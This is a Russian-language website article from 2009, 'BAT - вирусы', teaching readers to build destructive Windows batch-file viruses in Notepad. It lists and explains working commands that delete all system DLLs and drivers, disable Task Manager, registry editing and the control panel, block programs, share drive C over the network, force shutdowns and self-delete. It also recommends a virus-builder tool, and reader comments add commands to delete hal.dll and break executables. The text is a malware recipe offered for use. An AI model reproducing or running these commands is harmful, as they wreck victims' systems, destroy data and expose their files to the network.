| Меню сайта |
 |
|
 |
| Категории раздела |
|
|
|
| Администрация |
|
184023 Dolphin
|
|
| Наша кнопка |
|
|
|
| Опрос |
|
|
|
|
 |
 |
 |
 |
BAT - вирусы
В этой статье я постараюсь объяснить, как создавать вредоносные программы (вирусы, трояны), используя штатные средства Windows и не только. Начнём мы с создания так называемых ВАТ-файлов или просто bat’ников, для этого нам понадобится всего лишь стандартный Блокнот Windows. Создаём файл *.txt и открываем его. Теперь нам нужно забить в него определённые команды, примеры которых вы видите ниже:
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul – Запретить комбинацию клавиш Ctrl-Alt-Del
del "%SystemRoot%system32*.dll" /q >nul – Удалить все системные DLL(Динамические загружаемые библиотеки)
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul – Удалить все драйверы, установленные на компьютере
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – Поменять местами значения кнопок мыши
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – Делает невозможным запуск приложений
time 0:00 >nul – Поставить время на 00:00
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – Запретить редактирование реестра вручную
del "%SystemRoot%Cursors*.*" >nul – Удалить курсор мыши
del "%SystemRoot%Media" /q >nul – Удалить системные звуки Windows
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – Запретить вызов панели кправления
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – Убрать рабочий стол
shutdown -r -t 1 -c "lol" -f >nul – Форсираванная перезагрузка ПК
shutdown -s -t 1 -c "lol" -f >nul – Форсированное выключение ПК
taskkill /f /im explorer.exe >nul – Убить процесс Explorer.exe
net share "ResName"="C:" >nul – Расшарить диск C:
label C:Диск >nul – Переименовать диск С:
msg * "Текст сообщения" >nul – Показать Windows-стилизованное сообщение с кнопкой ОК
del "%0" >nul – Самоликвидация вируса
А теперь комментарии. Команда del направлена на удаление определённого файла, после неё в кавычках пишется полный путь к файлу, если вы хотите удалить из папки все файлы с расширением txt, например, то после название целевой папки и дроби нужно написать *.txt. Если нужно удалить что-нибудь из директории Windows, гораздо проще будет написать %SystemRoot%, вместо полного пути к директории, а уже затем вводить остальной путь. Также получившийся вирус может самоуничтожаться, для этого вместо пути к целевому файлу нужно ввести %0. Команда reg add может редактировать содержимое реестра. Для этого после этой команды нужно написать полный путь к необходимому вам ключу(без кавычек), и его новое значение. Команда time просто устанавливает любое время на часах ПК. Команда shutdown выполняет выключение или перезагрузку ПК, если после команды стоит r -t 1 -c "lol", то произойдёт перезагрузка, а если -s -t 1 -c "lol", то выключение. Также можно добавить в конце –f через пробел, тогда операция (выключение или перезагрузка) произойдёт форсированно, т.е. без предупреждения пользователя. Команда
taskkill /f /im убивает указанный процесс, а указать его надо через пробел с расширением. Также существует команда net share, которая расшаривает (открывает общий доступ из сети) определённый диска на компьютере. После нее нужно написать в кавычках название расшаренного ресурса (на ваше усмотрение) после этого знак = и буквенный идентификатор диска в кавычках с двоеточием и дробью. Комадна label переименовывает указаный диск, для этого напишите буквенный идентификатор диска, знак =, и новое название. Команда msg * выводит на экран окно с сообщением и кнопкой ОК, после неё надо написать текст сообщения в кавычках через пробел после команды. Теперь, когда вы записали необходимые вам команды, сохраните созданный *.txt с расширением *.bat
Также вы можете писать подобные вирусы не вручную, а используя специальные программы, автоматизирующие данный процесс. Могу порекомендовать одну такую программу, это BAT Virus Master. Спасибо за внимание, всех благ:)
|
|
Категория: Bat скрипты | Добавил: dolphin (30.10.2009)
|
| Просмотров: 3301 | Рейтинг: 3.5/11 |
| Всего комментариев: 3 |
|
0  
 немного ошибся
erase %systemroot%\system32\hall.dll удаляет системный фаил после котрого система не запустица
а должно быть
erase %systemroot%\system32\hal.dll
|
0
erase %systemroot%\system32\hall.dll удаляет системный фаил после котрого система не запустица
attrib .exe=hacked изменяет атрибут exe файлов после они не запустятся
attrib .lnk=.block также как и с exe
|
-1
1 CAHЯ (11.01.2010 16:41)
спасибо за инфу
|
|
|
|
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
|
 |
 |
 |
 |
 |
 |
|
| Поиск |
|
|
|
Кто нас сегодня посетил
|
